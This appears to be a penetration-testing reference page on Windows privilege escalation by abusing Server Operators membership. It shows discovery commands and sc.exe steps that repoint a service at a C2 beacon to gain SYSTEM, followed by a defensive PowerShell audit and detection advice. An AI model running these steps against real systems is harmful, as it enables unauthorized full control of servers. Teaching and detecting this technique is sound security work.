Overview
Members of the Server Operators group are able to modify service configurations. This can be abused to make a service execute a malicious executable instead of its normal binary.
Discovery
This requires a user in the Server Operators group.
```powershell
# Check your user's groups
whoami /groups
# Use PowerView to list the members of Server Operators
Get-NetGroupMember -Identity "Server Operators"
# Use the ActiveDirectory PowerShell module to list the members of Server Operators
Get-ADGroupMember -Identity "Server Operators"
```

Exploitation
First you'll need to generate a payload to execute, ideally a beacon from Sliver, msfvenom, or another C2 framework.
Next, use PowerShell to edit an existing service to execute your beacon.
```powershell
# Change the binary path (sc.exe requires the space after "binpath=")
sc.exe config [SERVICE NAME, EX. "VSS"] binpath= "[FULL PATH TO BEACON]"
# Ensure you have a listener running on your host
# Restart the service; this should trigger the callback
sc.exe stop [SERVICE NAME]
sc.exe start [SERVICE NAME]
```

This should get a callback as NT AUTHORITY\SYSTEM.
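From the defender's side, the two things worth checking are who sits in Server Operators and whether any service's ImagePath has been pointed at a binary outside the usual system directories, which is exactly what the binpath= change above leaves behind. The following PowerShell audit is an added example and is not part of the original page; it assumes it runs on a domain controller with the ActiveDirectory module installed, and the list of trusted directories in $TrustedRoots is an assumption to tune for your estate.

```powershell
# Added defensive audit (not from the original page).
# Assumes: ActiveDirectory module available; $TrustedRoots is an assumed
# list of directories a legitimate service binary is expected to live under.
Import-Module ActiveDirectory

# 1. Enumerate Server Operators (recursively, so nested groups are expanded).
#    This group has no members by default, so anything here should be reviewed.
$members = Get-ADGroupMember -Identity "Server Operators" -Recursive |
    Select-Object Name, objectClass, distinguishedName
Write-Host "Server Operators members: $($members.Count)"
$members | Format-Table -AutoSize

# 2. Flag services whose executable is not under a trusted root.
$TrustedRoots = @(
    "$env:SystemRoot\System32",
    "$env:SystemRoot\SysWOW64",
    "$env:ProgramFiles",
    "${env:ProgramFiles(x86)}"
)

$suspicious = Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $path = $_.PathName
    if (-not $path) { return }

    # Isolate the executable from quotes and arguments, e.g.
    #   "C:\Program Files\Foo\foo.exe" -svc   -> C:\Program Files\Foo\foo.exe
    #   C:\Windows\system32\svchost.exe -k x  -> C:\Windows\system32\svchost.exe
    $exe = if ($path.StartsWith('"')) { $path.Split('"')[1] } else { $path.Split(' ')[0] }

    $inTrusted = $false
    foreach ($root in $TrustedRoots) {
        if ($root -and $exe.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
            $inTrusted = $true
            break
        }
    }

    if (-not $inTrusted) {
        [PSCustomObject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            State     = $_.State
            Exe       = $exe
            ImagePath = $path
        }
    }
}

Write-Host "Services with a binary outside trusted roots: $(@($suspicious).Count)"
$suspicious | Format-Table -AutoSize
```

Run it from an elevated PowerShell session on the domain controller. A hit in the second list that points at a user-writable location (a profile directory, a temp folder, a share) deserves a look at the service's registry key, since a binpath= change lands as a new ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<name>; Sysmon Event ID 13 on that value gives a near-real-time signal for the same change. The simplest mitigation is to keep Server Operators empty, or at least reviewed as carefully as Domain Admins.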
Resources
| Hyperlink | Info |
|---|---|
| Hacktricks | Privileged Groups Privesc |
| HackingArticles | Server Operators Privesc |